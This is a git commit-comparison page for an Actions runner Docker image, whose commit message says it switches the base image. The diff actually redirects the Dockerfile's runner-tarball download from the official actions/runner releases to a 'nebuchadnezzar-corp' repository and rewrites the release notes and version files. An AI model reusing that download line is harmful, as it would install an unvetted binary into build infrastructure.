Compare commits

..

1 Commits

Author SHA1 Message Date
Bassem Dghaidi
1c48dad21d Switch to ubuntu-22.04 base image 2023-06-08 09:45:39 -04:00
4 changed files with 13 additions and 20 deletions

View File

@@ -9,7 +9,7 @@ ARG DOCKER_VERSION=20.10.23
RUN apt update -y && apt install curl unzip -y RUN apt update -y && apt install curl unzip -y
WORKDIR /actions-runner WORKDIR /actions-runner
RUN curl -f -L -o runner.tar.gz https://github.com/actions/runner/releases/download/v${RUNNER_VERSION}/actions-runner-linux-${RUNNER_ARCH}-${RUNNER_VERSION}.tar.gz \ RUN curl -f -L -o runner.tar.gz https://github.com/nebuchadnezzar-corp/runner/releases/download/v${RUNNER_VERSION}/actions-runner-linux-${RUNNER_ARCH}-${RUNNER_VERSION}.tar.gz \
&& tar xzf ./runner.tar.gz \ && tar xzf ./runner.tar.gz \
&& rm runner.tar.gz && rm runner.tar.gz

View File

@@ -1,25 +1,18 @@
## Features ## Features
- Resolve Actions Directly From Launch for Run Service Jobs (#2529) - Runner changes for communication with Results service (#2510, #2531, #2535, #2516)
- Send annotations to run-service (#2574) - Add `*.ghe.localhost` domains to hosted server check (#2536)
- Add `--no-default-labels` config option to self-hosted runners (#2443) - Add `OrchestrationId` to user-agent for better telemetry correlation. (#2568)
- Update container-hooks to 0.3.2 in runner docker image (#2618)
- Set runner environment in context and env (#2518)
- Switch runner image from Debian to Ubuntu 22.04 (#2651)
## Bugs ## Bugs
- Handle conflict errors from run service (#2570) - Fix JIT configurations on Windows (#2497)
- Fix null guard bug (#2576) - Guard against NullReference while creating HostContext (#2343)
- Trace WebSocket exception into verbose level to reduce noise in diag log (#2591) - Handles broken symlink in `Which` (#2150, #2196)
- Ensure multiple composite annotations are correctly written (#2311) - Adding curl retry for external tool downloads (#2552, #2557)
- Adding Consistency to 'Failed To Resolve Action Download Info' Infrastructure Error Flagging (#2488) - Limit the time we wait for waiting websocket to connect. (#2554)
- Filter out empty arguments in container hooks (#2633)
- Fix uses: docker://image:tag steps when container hook is used (#2626)
## Misc ## Misc
- Contribute.md: Fix link to style guidelines (#2560) - Bump container hooks version to 0.3.1 in runner image (#2496)
- Remove Temporary Serialization Shim (#2549) - Runner changes to communicate with vNext services (#2487, #2500, #2505, #2541, #2547)
- Move Using V2 Flow log to Trace (#2635)
- Add utf8 with bom (#2641)
_Note: Actions Runner follows a progressive release policy, so the latest release might not be available to your enterprise, organization, or repository yet. _Note: Actions Runner follows a progressive release policy, so the latest release might not be available to your enterprise, organization, or repository yet.
To confirm which version of the Actions Runner you should expect, please view the download instructions for your enterprise, organization, or repository. To confirm which version of the Actions Runner you should expect, please view the download instructions for your enterprise, organization, or repository.

View File

@@ -1 +1 @@
2.305.0 <Update to ./src/runnerversion when creating release>

View File

@@ -1 +1 @@
2.305.0 2.304.0